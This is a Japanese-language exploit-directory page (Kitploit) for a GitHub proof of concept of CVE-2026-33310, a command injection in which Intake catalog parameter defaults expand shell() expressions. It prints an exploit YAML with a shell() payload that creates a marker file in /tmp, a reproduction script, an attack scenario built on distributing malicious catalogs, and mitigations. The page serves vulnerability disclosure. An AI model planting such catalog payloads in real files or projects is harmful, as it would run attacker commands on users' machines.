Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-33310 — 概念実証コード:Intakeカタログのパラメータデフォルトにおけるshell()展開を介したコマンドインジェクションを実証するもので、エクスプロイトYAMLと再現スクリプトを含む。 | Kitploit
ツール/GitHubGitHub/redyank/cve-2026-33310
ペイロード生成脆弱性分析エクスプロイトウェブセキュリティコマンド&コントロール
GitHubredyank/cve-2026-33310

CVE-2026-33310

概念実証コード:Intakeカタログのパラメータデフォルトにおけるshell()展開を介したコマンドインジェクションを実証するもので、エクスプロイトYAMLと再現スクリプトを含む。

リポジトリを見る
14ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-33310

CVE-2026-33310(パラメータデフォルトにおけるshell()展開によるコマンドインジェクション)

概要

パラメータのデフォルト値内のshell()構文は、カタログ解析プロセス中に自動的に展開されるようです。 カタログにshell()のようなパラメータデフォルトが含まれている場合、カタログソースがアクセスされたときにコマンドが実行される可能性があります。 つまり、ユーザーが悪意のあるカタログYAMLを読み込むと、埋め込まれたコマンドがホストシステム上で実行される可能性があります。 この動作は、CWE-78: OSコマンドインジェクション / 安全でないシェル展開に分類される可能性があります。

詳細

この問題は、カタログソースがアクセスされたときにパラメータのデフォルト値がどのように展開されるかに起因しているようです。

カタログの読み込みとソースアクセス中:

Intakeはパラメータのデフォルト値を解決します デフォルトの展開を担当する関数がshell()構文を処理します シェル式がサブプロセスの実行をトリガーします これはカタログ評価中に発生するため、ユーザーがデータセット自体と明示的に操作する前にコマンドが実行される可能性があります。

影響を受けるロジックには次のものが含まれるようです:

root@kitploit:~
expand_defaults()

および関連するパラメータ解析メカニズム。

PoC

exploit.yaml

root@kitploit:~
metadata:
  version: 1
sources:
  rce_test:
    driver: csv
    description: "パラメータにおけるシェル展開のテスト"
    args:
      urlpath: "{{ cmd_exec }}"
    parameters:
      cmd_exec:
        display_name: "テストパラメータ"
        type: str
        default: "shell(touch /tmp/intake_rce_test)"

reproduce.py

root@kitploit:~
import intake
import os

PROOF_FILE = "/tmp/intake_rce_test"

if os.path.exists(PROOF_FILE):
    os.remove(PROOF_FILE)

print(f"[*] 実行前の証明ファイルの存在: {os.path.exists(PROOF_FILE)}")

try:
    cat = intake.open_catalog("exploit.yaml")

    print("ソースにアクセス中...")
    _ = cat["rce_test"]

except Exception as e:
    print(f" 実行中のエラー: {e}")

if os.path.exists(PROOF_FILE):
    print(f" コマンド実行が確認されました。検出: {PROOF_FILE}")
else:
    print("コマンド実行は発生しませんでした。")

攻撃シナリオ

潜在的な攻撃シナリオは次のとおりです:

  1. 攻撃者が悪意のあるIntakeカタログYAMLファイルを公開する
  2. 被害者がカタログをダウンロードまたは読み込む
  3. 被害者がカタログ内のソースエントリにアクセスする
  4. パラメータのデフォルトが展開される
  5. shell()式が埋め込まれたコマンドの実行をトリガーする

影響

この動作が意図的でないことが確認された場合、攻撃者は以下を介して悪意のあるカタログファイルを配布する可能性があります:

  • Gitリポジトリ
  • 共有データセット
  • URL
  • データサイエンスワークフロー
  • カタログを読み込むユーザーは、自分のローカルユーザー権限でコマンドを実行してしまう可能性があります。

推奨事項

考えられる緩和策には次のものが含まれます:

  • デフォルトでshell()展開を無効にする
  • 明示的なオプトインフラグ(例: allow_shell=True)を要求する
  • 信頼できないソースから読み込まれたカタログに対するシェル実行を制限する 追加情報やテストが必要な場合はお知らせください。 さらなる分析や検証のお手伝いを喜んでいたします。
ツールをダウンロード